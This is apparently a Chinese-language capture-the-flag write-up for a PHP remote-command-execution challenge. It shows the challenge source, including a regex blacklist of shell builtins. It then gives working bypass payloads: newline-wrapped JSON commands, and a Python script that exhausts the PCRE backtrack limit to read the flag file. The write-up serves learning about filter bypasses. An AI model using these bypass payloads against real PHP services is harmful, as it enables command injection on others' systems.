首先这题没源码是万万做不出来的,反正我是不知道这源码从哪来的
先上源码
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>
这个putenv你没有源码怎么做嘛
好了,下面就是怎么绕过了,分析一下代码逻辑,get或者post一下cmd参数,过个preg_match,然后json_decode,取cmd参数
小知识:
json_decode 接受一个 JSON 格式的字符串并且把它转换为 PHP 变量 ,当该参数$assoc为 TRUE 时,将返回 array 否则返回 object 。
看起来关键点就是这个preg_match了,一个很常规的思路是换行符绕过
测试payload:
?cmd={%0A"cmd":“pwd”%0A}
这里只在最前端和最后端单独用%0A匹配都不行,我尝试输出了,只有两个换行符才有效,单个换行符可以匹配到,盲猜是因为不是一行一行匹配的,会先去检查开始结尾或者开头那个通配符,然后去检查当行
如果只加了一个的话,那么就可以匹配到了,当然这是我猜的,有懂得师傅可以教教我
?cmd={%0A"cmd":“pwd”%0A}匹配为空
?cmd={%0A"cmd":“pwd”}匹配到{%0A"cmd":“pwd”}
?cmd={“cmd”:“pwd”%0A}匹配到{“cmd”:“pwd”%0A}
那么知道绕过方式过后就是随便搞了
查看当前目录?cmd={%0A"cmd":“ls /home/rceservice”%0A}看到flag就在/home/rceservice目录下
由于设置了绝对路径
?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}
第二种思路,其实就是正则匹配除了换行符不匹配,超出匹配超过一定次数他也不匹配了,直接返回false。是的就是这么傲娇
具体细节可以看https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
于是遵循这个原理,有了payload:
import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'
res = requests.post("http://challenges.fbctf.com:8085/", data={"cmd":payload})
print(res.text)
慢慢吐去吧,直接返回false
参考视频链接:https://www.bilibili.com/video/BV1JL411N7gm/